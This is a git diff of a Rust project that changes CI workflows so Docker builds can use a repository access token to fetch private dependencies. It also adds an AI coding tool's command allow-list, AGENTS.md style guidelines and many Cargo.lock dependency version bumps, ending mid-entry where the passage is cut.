diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000..5dbac7d Binary files /dev/null and b/.DS_Store differ diff --git a/.cargo/config.toml b/.cargo/config.toml new file mode 100644 index 0000000..c91c3f3 --- /dev/null +++ b/.cargo/config.toml @@ -0,0 +1,2 @@ +[net] +git-fetch-with-cli = true diff --git a/.claude/settings.local.json b/.claude/settings.local.json new file mode 100644 index 0000000..4fe89fb --- /dev/null +++ b/.claude/settings.local.json @@ -0,0 +1,20 @@ +{ + "permissions": { + "allow": [ + "Bash(cargo check:*)", + "Bash(cargo update:*)", + "Bash(ls:*)", + "Bash(git checkout:*)", + "Bash(cargo clean:*)", + "Bash(cargo metadata:*)", + "Bash(git fetch:*)", + "Bash(git rebase:*)", + "Bash(git pull:*)", + "Bash(git add:*)", + "Bash(GIT_EDITOR=true git rebase:*)", + "Bash(git merge:*)", + "Bash(git reset:*)", + "Bash(git commit:*)" + ] + } +} diff --git a/.github/workflows/build.yaml b/.github/workflows/build.yaml index dfc453a..9671fce 100644 --- a/.github/workflows/build.yaml +++ b/.github/workflows/build.yaml @@ -12,10 +12,15 @@ jobs: - uses: actions/checkout@v4 - name: Build binary using Docker shell: bash + env: + REPO_ACCESS_TOKEN: ${{ secrets.REPO_ACCESS_TOKEN }} run: | set -euxo pipefail mkdir -p /tmp/build-output - docker build -t synapse-builder:latest -f pkg/docker/build.Dockerfile . + export GITHUB_TOKEN="${REPO_ACCESS_TOKEN}" + DOCKER_BUILDKIT=1 docker build \ + --secret id=github_token,env=GITHUB_TOKEN \ + -t synapse-builder:latest -f pkg/docker/build.Dockerfile . docker create --name synapse-build synapse-builder:latest docker cp synapse-build:/output/synapse /tmp/build-output/synapse docker rm synapse-build @@ -32,10 +37,15 @@ jobs: - uses: actions/checkout@v4 - name: Build binary using Docker shell: bash + env: + REPO_ACCESS_TOKEN: ${{ secrets.REPO_ACCESS_TOKEN }} run: | set -euxo pipefail mkdir -p /tmp/build-output - docker build -t synapse-builder:latest -f pkg/docker/build.Dockerfile . + export GITHUB_TOKEN="${REPO_ACCESS_TOKEN}" + DOCKER_BUILDKIT=1 docker build \ + --secret id=github_token,env=GITHUB_TOKEN \ + -t synapse-builder:latest -f pkg/docker/build.Dockerfile . docker create --name synapse-build synapse-builder:latest docker cp synapse-build:/output/synapse /tmp/build-output/synapse docker rm synapse-build diff --git a/.github/workflows/pkg-build.yml b/.github/workflows/pkg-build.yml index ad9f981..06ce702 100644 --- a/.github/workflows/pkg-build.yml +++ b/.github/workflows/pkg-build.yml @@ -12,10 +12,16 @@ jobs: - name: Build DEB using Docker shell: bash + env: + REPO_ACCESS_TOKEN: ${{ secrets.REPO_ACCESS_TOKEN }} run: | set -euxo pipefail mkdir -p /tmp/deb-build-output - docker build -t synapse-builder-deb:latest -f pkg/deb/Dockerfile . + export GITHUB_TOKEN="${REPO_ACCESS_TOKEN}" + DOCKER_BUILDKIT=1 docker build \ + --build-arg REQUIRE_GITHUB_TOKEN=1 \ + --secret id=github_token,env=GITHUB_TOKEN \ + -t synapse-builder-deb:latest -f pkg/deb/Dockerfile . docker run -v "${GITHUB_WORKSPACE}:/tmp/repo" -v /tmp/deb-build-output:/tmp/output --rm synapse-builder-deb:latest - name: Installing package @@ -40,11 +46,14 @@ jobs: - name: Build RPM using release Dockerfile shell: bash + env: + REPO_ACCESS_TOKEN: ${{ secrets.REPO_ACCESS_TOKEN }} run: | set -euxo pipefail mkdir -p /tmp/rpm-build-output + export GITHUB_TOKEN="${REPO_ACCESS_TOKEN}" docker build -t synapse-builder-rpm:latest -f pkg/rpm/docker/Dockerfile pkg/rpm/docker/ - docker run -v "${GITHUB_WORKSPACE}:/tmp/repo" -v /tmp/rpm-build-output:/tmp/output --rm synapse-builder-rpm:latest + docker run -e GITHUB_TOKEN -v "${GITHUB_WORKSPACE}:/tmp/repo" -v /tmp/rpm-build-output:/tmp/output --rm synapse-builder-rpm:latest - name: Build systemd-enabled Oracle image for testing shell: bash diff --git a/.github/workflows/release.yaml b/.github/workflows/release.yaml index cf50791..493128f 100644 --- a/.github/workflows/release.yaml +++ b/.github/workflows/release.yaml @@ -62,11 +62,16 @@ jobs: runs-on: ${{ matrix.platform == 'linux/arm64' && 'ubuntu-24.04-arm' || 'ubuntu-latest' }} needs: - docker-prepare + env: + GITHUB_TOKEN: ${{ secrets.REPO_ACCESS_TOKEN }} strategy: fail-fast: false matrix: platform: ${{ fromJson(needs.docker-prepare.outputs.matrix) }} steps: + - name: Checkout + uses: actions/checkout@v4 + - name: Prepare run: | platform=${{ matrix.platform }} @@ -161,6 +166,7 @@ jobs: if: ${{ startsWith(github.ref, 'refs/tags/v') }} env: CARGO_TERM_COLOR: always + REPO_ACCESS_TOKEN: ${{ secrets.REPO_ACCESS_TOKEN }} runs-on: ${{ matrix.os }} strategy: fail-fast: false @@ -186,7 +192,11 @@ jobs: run: | set -euxo pipefail mkdir -p /tmp/build-output - docker build -t synapse-builder:latest -f pkg/docker/build.Dockerfile . + export GITHUB_TOKEN="${REPO_ACCESS_TOKEN}" + DOCKER_BUILDKIT=1 docker build \ + --build-arg REQUIRE_GITHUB_TOKEN=1 \ + --secret id=github_token,env=GITHUB_TOKEN \ + -t synapse-builder:latest -f pkg/docker/build.Dockerfile . docker create --name synapse-build synapse-builder:latest docker cp synapse-build:/output/synapse /tmp/build-output/synapse docker rm synapse-build @@ -228,10 +238,16 @@ jobs: - name: Build DEB using Docker shell: bash + env: + REPO_ACCESS_TOKEN: ${{ secrets.REPO_ACCESS_TOKEN }} run: | set -euxo pipefail mkdir -p /tmp/deb-build-output - docker build -t synapse-builder-deb:latest -f pkg/deb/Dockerfile . + export GITHUB_TOKEN="${REPO_ACCESS_TOKEN}" + DOCKER_BUILDKIT=1 docker build \ + --build-arg REQUIRE_GITHUB_TOKEN=1 \ + --secret id=github_token,env=GITHUB_TOKEN \ + -t synapse-builder-deb:latest -f pkg/deb/Dockerfile . docker run -v "${GITHUB_WORKSPACE}:/tmp/repo" -v /tmp/deb-build-output:/tmp/output --rm synapse-builder-deb:latest - name: Archive output package @@ -268,11 +284,14 @@ jobs: - name: Build RPM using Docker shell: bash + env: + REPO_ACCESS_TOKEN: ${{ secrets.REPO_ACCESS_TOKEN }} run: | set -euxo pipefail mkdir -p /tmp/rpm-build-output + export GITHUB_TOKEN="${REPO_ACCESS_TOKEN}" docker build -t synapse-builder-rpm:latest -f pkg/rpm/docker/Dockerfile pkg/rpm/docker/ - docker run -v "${GITHUB_WORKSPACE}:/tmp/repo" -v /tmp/rpm-build-output:/tmp/output --rm synapse-builder-rpm:latest + docker run -e GITHUB_TOKEN -v "${GITHUB_WORKSPACE}:/tmp/repo" -v /tmp/rpm-build-output:/tmp/output --rm synapse-builder-rpm:latest - name: Archive output package uses: actions/upload-artifact@v4 diff --git a/.github/workflows/wellness-check.yaml b/.github/workflows/wellness-check.yaml new file mode 100644 index 0000000..e551f87 --- /dev/null +++ b/.github/workflows/wellness-check.yaml @@ -0,0 +1,52 @@ +name: Wellness Check +on: + pull_request: + branches: [main] + +jobs: + fmt-and-test: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + + - uses: dtolnay/rust-toolchain@stable + with: + components: rustfmt + + - uses: Swatinem/rust-cache@v2 + + - name: Install packages + run: | + sudo apt-get update && sudo apt-get install -y --no-install-recommends \ + libc6-dev \ + g++ \ + gcc \ + make \ + git \ + build-essential \ + clang \ + libelf-dev \ + libelf1 \ + libssl-dev \ + zlib1g-dev \ + libzstd-dev \ + pkg-config \ + libcap-dev \ + binutils-multiarch-dev \ + cmake + + - name: Configure git for private deps + env: + REPO_ACCESS_TOKEN: ${{ secrets.REPO_ACCESS_TOKEN }} + run: | + if [ -n "${REPO_ACCESS_TOKEN:-}" ]; then + export GITHUB_TOKEN=$(echo -n "$REPO_ACCESS_TOKEN" | tr -d '\n\r') + git config --global url."https://x-access-token:${GITHUB_TOKEN}@github.com/".insteadOf "https://github.com/" + echo "CARGO_NET_GIT_FETCH_WITH_CLI=true" >> $GITHUB_ENV + fi + + - name: Check formatting + run: cargo fmt -- --check + + - name: Run tests + run: cargo test -- --include-ignored diff --git a/.gitignore b/.gitignore index 0650f05..337c146 100644 --- a/.gitignore +++ b/.gitignore @@ -46,4 +46,6 @@ upstreams_*.yaml *.rpm null *.log - +config_*.yaml +config_*.yml +synapse diff --git a/AGENTS.md b/AGENTS.md new file mode 100644 index 0000000..acd0dd3 --- /dev/null +++ b/AGENTS.md @@ -0,0 +1,10 @@ +- Use 'bd' for task tracking +- Shared configs: `rust-toolchain.toml`, `rustfmt.toml`, `deny.toml`, `flake.nix`, `.envrc.example`. +- Rust edition 2024; formatting via `rustfmt` (see `rustfmt.toml`, `max_width = 88`). +- Prefer `#![forbid(unsafe_code)]` and safe Unix APIs via `rustix` instead of `libc`. +…s, instead prefer using regular async traits (built into rust) and use an Enum instead of a trait object. Alternativel… +- Avoid OOP style code. Prefer using composition and Rust's data types (structs, enums). +- Use rust's `tracing` and `metrics` crates for logging, and be sure to utilize tracing spans to associate log messages… +- when using implicit returns in rust (such as returning Ok(()) on the last line of a function with the `return` keywor… +- Use standard Rust tests: unit tests in modules, integration tests under `tests/`. +- Leverage rust's testcontainers library and things like minio or aws localstack if minio doesn't work. diff --git a/Cargo.lock b/Cargo.lock index a36bdaa..2fb7653 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -99,7 +99,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "e01ed3140b2f8d422c68afa1ed2e85d996ea619c988ac834d255db32138655cb" dependencies = [ "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -201,7 +201,7 @@ dependencies = [ "serde_json", "serde_urlencoded", "smallvec", - "socket2 0.6.1", + "socket2 0.6.2", "time", "tracing", "url", @@ -216,7 +216,7 @@ dependencies = [ "actix-router", "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -345,9 +345,12 @@ checksum = "a23eb6b1614318a8071c9b2521f36b424b2c83db5eb3a0fead4a6c0809af6e61" [[package]] name = "arc-swap" -version = "1.7.1" +version = "1.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "69f7f8c3906b62b754cd5326047894316021dcfe5a194c8ea52bdd94934a3457" +checksum = "51d03449bb8ca2cc2ef70869af31463d1ae5ccc8fa3e334b307203fbf815207e" +dependencies = [ + "rustversion", +] [[package]] name = "arcstr" @@ -373,7 +376,7 @@ dependencies = [ "nom", "num-traits", "rusticata-macros", - "thiserror 2.0.17", + "thiserror 2.0.18", "time", ] @@ -385,7 +388,7 @@ checksum = "3109e49b1e4909e9db6515a30c633684d68cdeaa252f215214cb4fa1a5bfee2c" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", "synstructure", ] @@ -397,7 +400,7 @@ checksum = "7b18050c2cd6fe86c3a76584ef5e0baf286d038cda203eb6223df2cc413565f7" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -408,7 +411,7 @@ checksum = "9035ad2d096bed7955a320ee7e2230574d28fd3c3a0f186cbea1ff3c7eed5dbb" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -436,9 +439,9 @@ checksum = "c08606f8c3cbf4ce6ec8e28fb0014a2c086708fe954eaa885384a6165172e7e8" [[package]] name = "aws-lc-rs" -version = "1.15.1" +version = "1.15.4" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6b5ce75405893cd713f9ab8e297d8e438f624dde7d706108285f7e17a25a180f" +checksum = "7b7b6141e96a8c160799cc2d5adecd5cbbe5054cb8c7c4af53da0f83bb7ad256" dependencies = [ "aws-lc-sys", "untrusted 0.7.1", @@ -447,9 +450,9 @@ dependencies = [ [[package]] name = "aws-lc-sys" -version = "0.34.0" +version = "0.37.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "179c3777a8b5e70e90ea426114ffc565b2c1a9f82f6c4a0c5a34aa6ef5e781b6" +checksum = "5c34dda4df7017c8db52132f0f8a2e0f8161649d15723ed63fc00c82d0f2081a" dependencies = [ "cc", "cmake", @@ -492,9 +495,9 @@ dependencies = [ [[package]] name = "axum-core" -version = "0.5.5" +version = "0.5.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "59446ce19cd142f8833f856eb31f3eb097812d1479ab224f54d72428ca21ea22" +checksum = "08c78f31d7b1291f7ee735c1c6780ccde7785daae9a9206026862dab7d8792d1" dependencies = [ "bytes", "futures-core", @@ -552,7 +555,7 @@ dependencies = [ "miniz_oxide", "object", "rustc-demangle", - "windows-link 0.2.1", + "windows-link", ] [[package]] @@ -563,9 +566,9 @@ checksum = "4c7f02d4ea65f2c1853089ffd8d2787bdbc63de2f0d29dedbcf8ccdfa0ccd4cf" [[package]] name = "base16ct" -version = "0.3.0" +version = "1.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d8b59d472eab27ade8d770dcb11da7201c11234bef9f82ce7aa517be028d462b" +checksum = "fd307490d624467aa6f74b0eabb77633d1f758a7b25f12bceb0b22e08d9726f6" [[package]] name = "base64" @@ -581,9 +584,9 @@ checksum = "72b3254f16251a8381aa12e40e3c4d2f0199f8c6508fbecb9d91f575e0fbb8c6" [[package]] name = "base64ct" -version = "1.8.0" +version = "1.8.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "55248b47b0caf0546f7988906588779981c43bb1bc9d0c44087278f80cdb44ba" +checksum = "2af50177e190e07a26ab74f8b1efbfe2ef87da2116221318cb1c2e82baf7de06" [[package]] name = "bitflags" @@ -668,9 +671,9 @@ dependencies = [ [[package]] name = "bumpalo" -version = "3.19.0" +version = "3.19.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "46c5e41b57b8bba42a04676d81cb89e9ee8e859a1a66f80a5a72e1cb76b34d43" +checksum = "5dd9dc738b7a8311c7ade152424974d8115f2cdad61e8dab8dac9f2362298510" [[package]] name = "byteorder" @@ -695,9 +698,9 @@ dependencies = [ [[package]] name = "camino" -version = "1.2.1" +version = "1.2.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "276a59bf2b2c967788139340c9f0c5b12d7fd6630315c15c217e559de85d2609" +checksum = "e629a66d692cb9ff1a1c664e41771b3dcaf961985a9774c0eb0bd1b51cf60a48" dependencies = [ "serde_core", ] @@ -722,14 +725,14 @@ dependencies = [ "semver", "serde", "serde_json", - "thiserror 2.0.17", + "thiserror 2.0.18", ] [[package]] name = "cc" -version = "1.2.47" +version = "1.2.55" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cd405d82c84ff7f35739f175f67d8b9fb7687a0e84ccdc78bd3568839827cf07" +checksum = "47b26a0954ae34af09b50f0de26458fa95369a0d478d8236d3f93082b219bd29" dependencies = [ "find-msvc-tools", "jobserver", @@ -794,7 +797,7 @@ dependencies = [ "num-traits", "serde", "wasm-bindgen", - "windows-link 0.2.1", + "windows-link", ] [[package]] @@ -835,23 +838,23 @@ dependencies = [ [[package]] name = "clap" -version = "4.5.54" +version = "4.5.56" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c6e6ff9dcd79cff5cd969a17a545d79e84ab086e444102a591e288a8aa3ce394" +checksum = "a75ca66430e33a14957acc24c5077b503e7d374151b2b4b3a10c83b4ceb4be0e" dependencies = [ "clap_builder", - "clap_derive 4.5.49", + "clap_derive 4.5.55", ] [[package]] name = "clap_builder" -version = "4.5.54" +version = "4.5.56" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fa42cf4d2b7a41bc8f663a7cab4031ebafa1bf3875705bfaf8466dc60ab52c00" +checksum = "793207c7fa6300a0608d1080b858e5fdbe713cdc1c8db9fb17777d8a13e63df0" dependencies = [ "anstream", "anstyle", - "clap_lex 0.7.6", + "clap_lex 0.7.7", "strsim 0.11.1", ] @@ -870,14 +873,14 @@ dependencies = [ [[package]] name = "clap_derive" -version = "4.5.49" +version = "4.5.55" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2a0b5487afeab2deb2ff4e03a807ad1a03ac532ff5a2cee5d86884440c7f7671" +checksum = "a92793da1a46a5f2a02a6f4c46c6496b28c43638adea8306fcb0caa1634f24e5" dependencies = [ "heck 0.5.0", "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -891,15 +894,15 @@ dependencies = [ [[package]] name = "clap_lex" -version = "0.7.6" +version = "0.7.7" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a1d728cc89cf3aee9ff92b05e62b19ee65a02b5702cff7d5a377e32c6ae29d8d" +checksum = "c3e64b0cc0439b12df2fa678eae89a1c56a529fd067a9115f7827f1fffd22b32" [[package]] name = "cmake" -version = "0.1.54" +version = "0.1.57" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e7caa3f9de89ddbe2c607f4101924c5abec803763ae9534e4f4d7d8f84aa81f0" +checksum = "75443c44cd6b379beb8c5b45d85d0773baf31cce901fe7bb252f4eff3008ef7d" dependencies = [ "cc", ] @@ -945,11 +948,20 @@ version = "0.1.16" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "f9d839f2a20b0aee515dc581a6172f2321f96cab76c1a38a4c584a194955390e" dependencies = [ - "getrandom 0.2.16", + "getrandom 0.2.17", "once_cell", "tiny-keccak", ] +[[package]] +name = "convert_case" +version = "0.10.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "633458d4ef8c78b72454de2d54fd6ab2e60f9e02be22f3c6104cdc8a4e0fceb9" +dependencies = [ + "unicode-segmentation", +] + [[package]] name = "cookie" version = "0.16.2" @@ -1102,7 +1114,7 @@ checksum = "f46882e17999c6cc590af592290432be3bce0428cb0d5f8b6715e4dc7b383eb3" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -1135,7 +1147,7 @@ dependencies = [ "proc-macro2", "quote", "strsim 0.11.1", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -1146,7 +1158,7 @@ checksum = "fc34b93ccb385b40dc71c6fceac4b2ad23662c7eeb248cf10d529b7e055b6ead" dependencies = [ "darling_core", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -1165,9 +1177,9 @@ dependencies = [ [[package]] name = "data-encoding" -version = "2.9.0" +version = "2.10.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2a2330da5de22e8a3cb63252ce2abb30116bf5265e89c0e01bc17015ce30a476" +checksum = "d7a1e2f27636f116493b8b860f5546edb47c8d8f8ea73e1d2a20be88e28d1fea" [[package]] name = "der" @@ -1232,7 +1244,7 @@ dependencies = [ "darling", "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -1242,30 +1254,38 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "ab63b0e2bf4d5928aff72e83a7dace85d7bba5fe12dcc3c5a572d78caffd3f3c" dependencies = [ "derive_builder_core", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] name = "derive_more" -version = "2.0.1" +version = "2.1.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "093242cf7570c207c83073cf82f79706fe7b8317e98620a47d5be7c3d8497678" +checksum = "d751e9e49156b02b44f9c1815bcb94b984cdcc4396ecc32521c739452808b134" dependencies = [ "derive_more-impl", ] [[package]] name = "derive_more-impl" -version = "2.0.1" +version = "2.1.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bda628edc44c4bb645fbe0f758797143e4e07926f7ebf4e9bdfbd3d2ce621df3" +checksum = "799a97264921d8623a957f6c3b9011f3b5492f557bbb7a5a19b7fa6d06ba8dcb" dependencies = [ + "convert_case", "proc-macro2", "quote", - "syn 2.0.111", + "rustc_version", + "syn 2.0.114", "unicode-xid", ] +[[package]] +name = "destructure_traitobject" +version = "0.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3c877555693c14d2f84191cfd3ad8582790fc52b5e2274b40b59cf5f5cea25c7" + [[package]] name = "digest" version = "0.10.7" @@ -1298,7 +1318,7 @@ checksum = "97369cbbc041bc366949bc74d34658d6cda5621039731c6310521892a3a20ae0" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -1396,7 +1416,7 @@ dependencies = [ "heck 0.5.0", "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -1461,9 +1481,9 @@ checksum = "28dea519a9695b9977216879a3ebfddf92f1c08c05d984f8996aecd6ecdc811d" [[package]] name = "find-msvc-tools" -version = "0.1.5" +version = "0.1.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3a3076410a55c90011c298b04d0cfa770b00fa04e1e3c97d3f6c9de105a03844" +checksum = "5baebc0774151f905a1a2cc41989300b1e6fbb29aff0ceffa1064fdd3088d582" [[package]] name = "flate2" @@ -1532,9 +1552,9 @@ dependencies = [ [[package]] name = "fs-err" -version = "3.2.0" +version = "3.2.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "62d91fd049c123429b018c47887d3f75a265540dd3c30ba9cb7bae9197edb03a" +checksum = "baf68cef89750956493a66a10f512b9e58d9db21f2a573c079c0bdf1207a54a7" dependencies = [ "autocfg", "tokio", @@ -1611,7 +1631,7 @@ checksum = "162ee34ebcb7c64a8abebc059ce0fee27c2262618d7b60ed8faf72fef13c3650" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -1673,14 +1693,14 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "1bd49230192a3797a9a4d6abe9b3eed6f7fa4c8a8a4947977c6f80025f92cbd8" dependencies = [ "rustix", - "windows-link 0.2.1", + "windows-link", ] [[package]] name = "getrandom" -version = "0.2.16" +version = "0.2.17" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "335ff9f135e4384c8150d6f27c6daed433577f86b4750418338c01a1a2528592" +checksum = "ff2abc00be7fca6ebc474524697ae276ad847ad0a6b3faa4bcb027e9a4614ad0" dependencies = [ "cfg-if", "js-sys", @@ -1712,7 +1732,7 @@ dependencies = [ "proc-macro-error2", "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -1744,7 +1764,7 @@ dependencies = [ "futures-sink", "futures-util", "http 0.2.12", - "indexmap 2.12.1", + "indexmap 2.13.0", "slab", "tokio", "tokio-util", @@ -1753,9 +1773,9 @@ dependencies = [ [[package]] name = "h2" -version = "0.4.12" +version = "0.4.13" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f3c0b69cfcb4e1b9f1bf2f53f95f766e4661169728ec61cd3fe5a0166f2d1386" +checksum = "2f44da3a8150a6703ed5d34e164b875fd14c2cdab9af1252a9a1020bde2bdc54" dependencies = [ "atomic-waker", "bytes", @@ -1763,7 +1783,7 @@ dependencies = [ "futures-core", "futures-sink", "http 1.4.0", - "indexmap 2.12.1", + "indexmap 2.13.0", "slab", "tokio", "tokio-util", @@ -1851,13 +1871,13 @@ dependencies = [ [[package]] name = "hostname" -version = "0.4.1" +version = "0.4.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a56f203cd1c76362b69e3863fd987520ac36cf70a8c92627449b2f64a8cf7d65" +checksum = "617aaa3557aef3810a6369d0a99fac8a080891b68bd9f9812a1eeda0c0730cbd" dependencies = [ "cfg-if", "libc", - "windows-link 0.1.3", + "windows-link", ] [[package]] @@ -1928,6 +1948,12 @@ version = "1.0.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "df3b46402a9d5adb4c86a0cf463f42e19994e3ee891101b1841f30a545cb49a9" +[[package]] +name = "humantime" +version = "2.3.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "135b12329e5e3ce057a9f972339ea52bc954fe1e9358ef27f95e89716fbc5424" + [[package]] name = "hyper" version = "1.8.1" @@ -1938,7 +1964,7 @@ dependencies = [ "bytes", "futures-channel", "futures-core", - "h2 0.4.12", + "h2 0.4.13", "http 1.4.0", "http-body", "httparse", @@ -2000,7 +2026,7 @@ dependencies = [ "libc", "percent-encoding", "pin-project-lite", - "socket2 0.6.1", + "socket2 0.6.2", "system-configuration", "tokio", "tower-service", @@ -2010,9 +2036,9 @@ dependencies = [ [[package]] name = "iana-time-zone" -version = "0.1.64" +version = "0.1.65" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "33e57f83510bb73707521ebaffa789ec8caf86f9657cad665b092b581d40e9fb" +checksum = "e31bc9ad994ba00e440a8aa5c9ef0ec67d5cb5e5cb0cc7f8b744a35b389cc470" dependencies = [ "android_system_properties", "core-foundation-sys", @@ -2080,9 +2106,9 @@ checksum = "7aedcccd01fc5fe81e6b489c15b247b8b0690feb23304303a9e560f37efc560a" [[package]] name = "icu_properties" -version = "2.1.1" +version = "2.1.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e93fcd3157766c0c8da2f8cff6ce651a31f0810eaa1c51ec363ef790bbb5fb99" +checksum = "020bfc02fe870ec3a66d93e677ccca0562506e5872c650f893269e08615d74ec" dependencies = [ "icu_collections", "icu_locale_core", @@ -2094,9 +2120,9 @@ dependencies = [ [[package]] name = "icu_properties_data" -version = "2.1.1" +version = "2.1.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "02845b3647bb045f1100ecd6480ff52f34c35f82d9880e029d329c21d1054899" +checksum = "616c294cf8d725c6afcd8f55abc17c56464ef6211f9ed59cccffe534129c77af" [[package]] name = "icu_provider" @@ -2168,9 +2194,9 @@ dependencies = [ [[package]] name = "indexmap" -version = "2.12.1" +version = "2.13.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0ad4bb2b565bca0645f4d68c5c9af97fba094e9791da685bf83cb5f3ce74acf2" +checksum = "7714e70437a7dc3ac8eb7e6f8df75fd8eb422675fc7678aff7364301092b1017" dependencies = [ "equivalent", "hashbrown 0.16.1", @@ -2218,7 +2244,7 @@ dependencies = [ "rustls-pki-types", "serde", "serde_json", - "thiserror 2.0.17", + "thiserror 2.0.18", "tokio", ] @@ -2248,20 +2274,19 @@ checksum = "cf370abdafd54d13e54a620e8c3e1145f28e46cc9d704bc6d94414559df41763" [[package]] name = "iptables" -version = "0.5.3" +version = "0.6.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "587f29670d67df4c7af1631928dcc592e24e897e961f89b06b142b95702ce21f" +checksum = "f30c9a636a0a728c67d1d420471c99b215708a17c222bb9afb16d0821e2d80d8" dependencies = [ "lazy_static", - "nix 0.29.0", "regex", ] [[package]] name = "iri-string" -version = "0.7.9" +version = "0.7.10" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4f867b9d1d896b67beb18518eda36fdb77a32ea590de864f1325b294a6d14397" +checksum = "c91338f0783edbd6195decb37bae672fd3b165faffb89bf7b9e6942f8b1a731a" dependencies = [ "memchr", "serde", @@ -2275,15 +2300,15 @@ checksum = "a6cb138bb79a146c1bd460005623e142ef0181e3d0219cb493e02f7d08a35695" [[package]] name = "itoa" -version = "1.0.15" +version = "1.0.17" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4a5f13b858c8d314ee3e8f639011f7ccefe71f97f96e50151fb991f267928e2c" +checksum = "92ecc6618181def0457392ccd0ee51198e065e016d1d527a7ac1b6dc7c1f09d2" [[package]] name = "jiff" -version = "0.2.16" +version = "0.2.18" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "49cce2b81f2098e7e3efc35bc2e0a6b7abec9d34128283d7a26fa8f32a6dbb35" +checksum = "e67e8da4c49d6d9909fe03361f9b620f58898859f5c7aded68351e85e71ecf50" dependencies = [ "jiff-static", "log", @@ -2294,13 +2319,13 @@ dependencies = [ [[package]] name = "jiff-static" -version = "0.2.16" +version = "0.2.18" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "980af8b43c3ad5d8d349ace167ec8170839f753a42d233ba19e08afe1850fa69" +checksum = "e0c84ee7f197eca9a86c6fd6cb771e55eb991632f15f2bc3ca6ec838929e6e78" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -2337,9 +2362,9 @@ dependencies = [ [[package]] name = "js-sys" -version = "0.3.82" +version = "0.3.85" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b011eec8cc36da2aab2d5cff675ec18454fad408585853910a202391cf9f8e65" +checksum = "8c942ebf8e95485ca0d52d97da7c5a2c387d0e7f0ba4c35e93bfcaee045955b3" dependencies = [ "once_cell", "wasm-bindgen", @@ -2347,13 +2372,13 @@ dependencies = [ [[package]] name = "jsonwebtoken" -version = "10.2.0" +version = "10.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c76e1c7d7df3e34443b3621b459b066a7b79644f059fc8b2db7070c825fd417e" +checksum = "0529410abe238729a60b108898784df8984c87f6054c9c4fcacc47e4803c1ce1" dependencies = [ "base64 0.22.1", "ed25519-dalek", - "getrandom 0.2.16", + "getrandom 0.2.17", "hmac", "js-sys", "p256", @@ -2411,7 +2436,7 @@ checksum = "626c6fbcb5088716de86d0ccbdccedc17b13e59f41a605a3274029335e71fcbb" dependencies = [ "anyhow", "cargo_metadata", - "clap 4.5.54", + "clap 4.5.56", "libbpf-rs", "libbpf-sys", "memmap2 0.5.10", @@ -2447,15 +2472,15 @@ dependencies = [ [[package]] name = "libc" -version = "0.2.177" +version = "0.2.180" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2874a2af47a2325c2001a6e6fad9b16a53b802102b528163885171cf92b15976" +checksum = 